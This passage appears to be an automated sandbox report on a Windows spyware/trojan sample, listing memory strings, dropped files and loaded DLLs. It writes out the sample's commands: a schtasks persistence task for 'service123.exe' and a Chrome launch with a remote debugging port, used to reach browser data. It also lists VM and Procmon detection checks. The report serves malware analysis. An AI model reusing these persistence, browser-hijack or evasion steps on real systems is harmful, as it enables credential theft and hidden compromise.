Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000004.00000002.2016971939.0000197C0320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012849282.0000197C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011721004.0000197C026FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2014997393.0000197C02E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 00000004.00000002.2014997393.0000197C02E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico800106
Source: chrome.exe, 00000004.00000002.2015069239.0000197C02E6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000004.00000002.2015069239.0000197C02E6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: chrome.exe, 00000004.00000002.2015160827.0000197C02E8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000004.00000002.2014667609.0000197C02D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000004.00000002.2014667609.0000197C02D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 00000004.00000002.2013862489.0000197C02BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000004.00000003.1992501874.0000197C02EF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000004.00000002.2012171630.0000197C0281C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000004.00000002.2013965792.0000197C02BE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012254569.0000197C02864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2014152138.0000197C02C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013401592.0000197C02A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013290383.0000197C02A38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000004.00000002.2013401592.0000197C02A7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en/
Source: chrome.exe, 00000004.00000002.2013512068.0000197C02AD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1992983273.0000197C02F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991913654.0000197C02EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1994063155.0000197C03190000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2015359704.0000197C02F10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1992501874.0000197C02EF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000004.00000002.2018727006.000031C80078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.1977703910.000031C800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1977939557.000031C80039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2018942069.000031C80080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000004.00000002.2018727006.000031C80078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.1977703910.000031C800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1977939557.000031C80039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2018942069.000031C80080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000004.00000002.2018727006.000031C80078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000004.00000002.2018727006.000031C80078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1978175994.000031C800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.1977703910.000031C800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1977939557.000031C80039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2018942069.000031C80080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000004.00000002.2009525854.0000197C0220C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000004.00000002.2015222235.0000197C02EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g1
Source: chrome.exe, 00000004.00000003.1973773678.00007884002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1973750991.00007884002D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000004.00000002.2012254569.0000197C02864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2009525854.0000197C0220C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012700791.0000197C028F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013142918.0000197C02A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1981539073.0000197C02690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2015069239.0000197C02E6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012438025.0000197C028AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000004.00000002.2012671832.0000197C028EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chrome.exe, 00000004.00000002.2004658088.00000070657FD000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxI&)
Source: chrome.exe, 00000004.00000002.2014152138.0000197C02C3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000004.00000002.2014997393.0000197C02E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000004.00000002.2014997393.0000197C02E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000004.00000002.2014997393.0000197C02E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000004.00000002.2012171630.0000197C0281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012849282.0000197C02960000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000004.00000003.1981539073.0000197C02690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012849282.0000197C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011467767.0000197C02694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1992501874.0000197C02EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012438025.0000197C028AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000004.00000002.2014436124.0000197C02CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012849282.0000197C02960000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000004.00000002.2017047870.0000197C0328C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2015222235.0000197C02EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013401592.0000197C02A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2015745219.0000197C02FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013862489.0000197C02BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013401592.0000197C02A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2015745219.0000197C02FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013862489.0000197C02BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000004.00000002.2016319192.0000197C03078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000004.00000002.2012171630.0000197C0281C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/es-USx(
Source: chrome.exe, 00000004.00000002.2014860575.0000197C02DC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011986994.0000197C027B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012849282.0000197C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011721004.0000197C026FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000004.00000002.2012849282.0000197C02960000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
Source: chrome.exe, 00000004.00000002.2014860575.0000197C02DC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icovements.
Source: chrome.exe, 00000004.00000002.2011576641.0000197C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000004.00000002.2014260598.0000197C02C98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000004.00000002.2009525854.0000197C0220C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000004.00000002.2011986994.0000197C027B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000004.00000002.2012075889.0000197C027EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000004.00000002.2011576641.0000197C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012577747.0000197C028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012577747.0000197C028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012577747.0000197C028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012577747.0000197C028E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010709999.0000197C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0F9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0F9D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_6C0F9E27

System Summary

Source: C:\Users\user\Desktop\file.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\service123.exe 05466AC3A1F09726E552D0CBF3BAC625A7EB7944CEDF812F60B066DCBD74AFB1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 1828
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: secyibqm ZLIB complexity 0.9947168471269296
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/7@12/4
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\DGdQGkLyQR Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7152
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\JStVXPURjEhqLJtWBhCN
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: chrome.exe, 00000004.00000002.2013011523.0000197C029C8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe Virustotal: Detection: 45%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2288,i,13659262306711728506,10044416239289748957,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: file.exe Static file information: File size 4392448 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x277800
Source: file.exe Static PE information: Raw size of secyibqm is bigger than: 0x100000 < 0x1b5400
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F8230 LoadLibraryA,GetProcAddress,FreeLibrary,PathCchRemoveExtension,GetLastError, 8_2_009F8230
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x431b06 should be: 0x43df3b
Source: file.exe Static PE information: section name: secyibqm
Source: file.exe Static PE information: section name: jcradwod
Source: file.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr Static PE information: section name: .eh_fram
Source: file.exe Static PE information: section name: secyibqm entropy: 7.9562618999331445
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18219D9 second address: 18219DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
